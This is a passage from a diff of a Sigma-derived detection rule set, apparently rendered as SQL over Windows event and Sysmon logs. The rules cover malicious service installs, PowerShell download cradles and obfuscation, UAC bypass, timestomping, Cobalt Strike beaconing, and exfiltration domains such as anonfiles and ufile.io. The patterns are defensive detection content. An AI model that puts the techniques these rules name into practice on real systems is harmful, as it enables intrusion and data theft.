TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' 